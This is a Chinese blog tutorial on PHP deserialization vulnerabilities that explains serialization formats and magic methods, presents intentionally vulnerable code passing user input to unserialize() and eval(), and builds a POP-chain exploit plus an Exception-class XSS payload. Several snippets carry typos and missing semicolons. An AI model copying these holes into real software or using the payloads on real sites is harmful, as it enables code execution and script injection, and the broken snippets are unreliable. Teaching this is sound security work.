反序列化漏洞

最新推荐文章于 2023-02-23 11:32:42 发布
最新推荐文章于 2023-02-23 11:32:42 发布
阅读量304 收藏
点赞数
分类专栏: Web安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48947141/article/details/121101560
版权

一、基础反序列化

(1)序列化:在各类语言中,将对象的状态信息转换为可存储或可传输的过程。

<?php
class test{
	public $test;
    function __construct(){
        echo "对象被创建时调用";
		}
    function __destruct(){
        echo "对象被销毁时调用";
        //system($_GET['cmd']);
    }
}
$test = New test;
echo "<br>";
echo serialize($test);
echo "<br>";
?>

 上述代码通过serialize()进行序列化。输出如下图:

(2)反序列化:为了方便对象的传输,通过文件、网络等方式将序列化后的字符串进行传输,最终通过反序列化获取序列化之前的对象。

<?php
class test{
	function __construct(){
		echo "创建时调用";
	}
	function __destruct(){
		echo "销毁时调用";
		eval($_GET['ip']);
	}
}
unserialize($_GET['cmd']);
?>

上述代码通过unserialize()反序列化。如下图:

(3)PHP序列化后基本类型表达:

  • 布尔型(bool) :b:value => b:0
  • 整数型(int):i:value => i:1
  • 字符串型(str):s:length:"value" => s:4:"aaaa"
  • 数组型(array):a:<length>:{key,value pairs} => a:1:{i:1;s:1:"a"}
  • 对象型(object):O:<class_name_length>:
  • NULL型:N

(4)常见魔术方法:

  • __construct:对象被创建时触发
  • __destruct:对象被销毁时触发
  • __toString:对象被当作一个字符串使用时触发
  • __sleep:序列化对象前调用(其返回需要是一个数组)
  • __wakeup:反序列化恢复对象前调用
  • __call:调用对象中不存在的方法时自动调用
  • __get:从不可访问的属性读取数据

(5)实例:

<?php
class lemon{
    protected $ClassObj;
    function __construct(){
        $this->ClassObj = New normal();
    }
    function __destruct(){
        $this->ClassObj->action()
    }
}
class normal{
    function action(){
        echo "don not give up ";
    }
}
class eavl{
    private $data;
    function action(){
        eval($this->data)
    }
}
unserialize($_GET['cmd'];
?>

代码分析:

lemon类正常调用时创建一个normal实列,当该对象销毁时调用normal实例的action方法。

如果将$this->ClassObj替换为eavl类,当normal实例调用action方法时进入eval()函数。

Exploit构造:

将__construct中的ClassObj换为eavl类,然后将eavl类的私有属性data赋值为想要执行的命令。

构造代码如下:

<?php

class lemon{
    protected $ClassObj;
    function __construct(){
        $this->ClassObj = New eavl();
    }
    function __destruct(){
        echo "over";
    }
}
class eavl{
    private $data="phpinfo();";
}
echo serialize(New lemon());
echo urlencode(serialize(New lemon()));
?>

PS:因为ClassObj是protected属性,所以存在"%00*%00"来表示它,而%00是不可见字符,在构造Exploit时使用urlencode来避免“%00"缺失。

 使用构造的exploit成功执行命令:

 二、原生类利用

在实际的挖洞过程中经常遇到没有合适的利用链,这需要利用PHP本身自带的原生类。

(1)__toString()

__toString是当对象作为字符串处理时,便会自动触发。

<?php
echo unserialize($__REQUEST['cmd']);
?>

Exploit生成:

<?php
echo urlencode(serialize(new Exception("<script>alert('zhagn')</script>")));
?>

主要利用PHP内置Exception类对错误消息没有做过滤,导致最终反序列化后输出内容在网页中造成XSS。

花拾八
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C# json序列解析
04-08
支持.net 2.0以上的版本,用来解析json
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
C#序列漏洞
m0_47968686的博客
08-20 1561
CVE-2020-0688序列漏洞 漏洞成因 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥伪造__VIEWSTATE参数从而触发序列漏洞。 环境、工具 WinServer2016、Exchange Server2016、win10、dnspy 分析 default.aspx被解析,继承Page类(Page
CVE-2022-48282 MongoDB .NET/C# 驱动存在序列漏洞
murphysec的博客
02-23 658
MongoDB .NET/C# 驱动用于将 .NET 应用程序连接到 MongoDB 集群并建立通信,并使用 _t 字段鉴别属性名称。 MongoDB .NET/C# 驱动 2.19.0 之前版本存在序列漏洞,对于用 C# 编写的应用程序,攻击者满足以下条件时可利用此漏洞远程执行任意代码,并造成拒绝服务:
序列漏洞CVE-2017-10271复现
春日野穹
10-23 1777
0x1 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器 的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性 0x2 漏洞检测 通过常用的序列工具检测可以发现...
Java序列漏洞利用工具.zip
04-10
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
小白看得懂的MySQL JDBC 序列漏洞分析 - 先知社区1
08-03
【MySQL JDBC 序列漏洞分析】 MySQL JDBC 序列漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
Shiro序列漏洞检测工具
01-05
Shiro1.2.4及以下版本存在序列漏洞,该工具用于测试该漏洞
XStream1.4.16序列漏洞(CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了XStream 序列漏洞(CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发序列,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
JAVA序列漏洞知识点整理
01-20
jenkins序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA序列漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA序列漏洞相关的知识点。  JAVA序列漏洞  序列漏洞的...
shiro序列漏洞暴力破解漏洞检测工具
09-14
1.shiro序列漏洞、暴力破解漏洞检测工具源码 2.shiro序列漏洞、暴力破解漏洞检测工具jar包 3.shiro序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro序列漏洞利用工具
11-09
图形界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Java序列漏洞利用工具V1.7.jar
03-25
Java序列漏洞利用工具
php 结构体_PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
weixin_39532352的博客
11-21 124
作者:LoRexxar'@知道创宇404实验室 @LoRexxar 时间:2019年10月25日国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细...
序列漏洞原理从零学起-小白都能懂序列漏洞
silencediors的博客
11-06 1020
前言 鼓起很大的勇气写这篇博文,不想承认我一直以来对序列漏洞就是一知半解的事实。其实我一直对序列漏洞有个执念,就是在我java这门语言完全不懂的时候我就非要去研究java的各种序列,然后把自己逼到一个绝路,大概这个持续时间有一两个月,还是一头雾水。后来我慢慢读代码,不懂的百度,也跟进学习,直到我有一天接触到php序列,哦,原来序列是这样。记得当时java里面的各种rmi,射链...
DataContractSerializer序列漏洞
UKK
06-18 343
DataContractSerializer序列漏洞 http://www.ifind.cc/view/225
单例模式的漏洞,通过射和序列序列来破解单例,以及如何避免这些漏洞
Mr.SoftRock的博客
08-30 421
这几天学习了一下设计模式,对单例模式又有了新的认识,发现了一篇解释很通透的博文,分享一下。 原文点击
RMI序列漏洞 修复
最新发布
06-08
RMI序列漏洞是一种常见的Java Web应用程序漏洞,攻击者可以利用该漏洞在目标服务器上执行任意代码。该漏洞利用的核心是Java的序列机制,攻击者可以通过构造特定的序列对象来触发漏洞。 要修复RMI序列漏洞,需要进行以下步骤: 1. 升级Java版本:在较新版本的Java中,已经修复了一些序列漏洞,因此升级Java版本是一种简单有效的修复方法。 2. 序列对象过滤:过滤掉不受信任的序列对象,只序列可信任的对象,这样可以有效减少攻击面。 3. 自定义序列/序列机制:使用自定义的序列/序列机制,不使用Java默认的序列/序列机制,可以避免一些常见的序列漏洞。 4. 对于不必要的远程方法调用接口,可以禁用或者限制远程方法调用。 5. 增强代码审计:对于可能存在RMI序列漏洞的代码,进行仔细审计和测试,以及使用一些工具来帮助检测潜在的漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值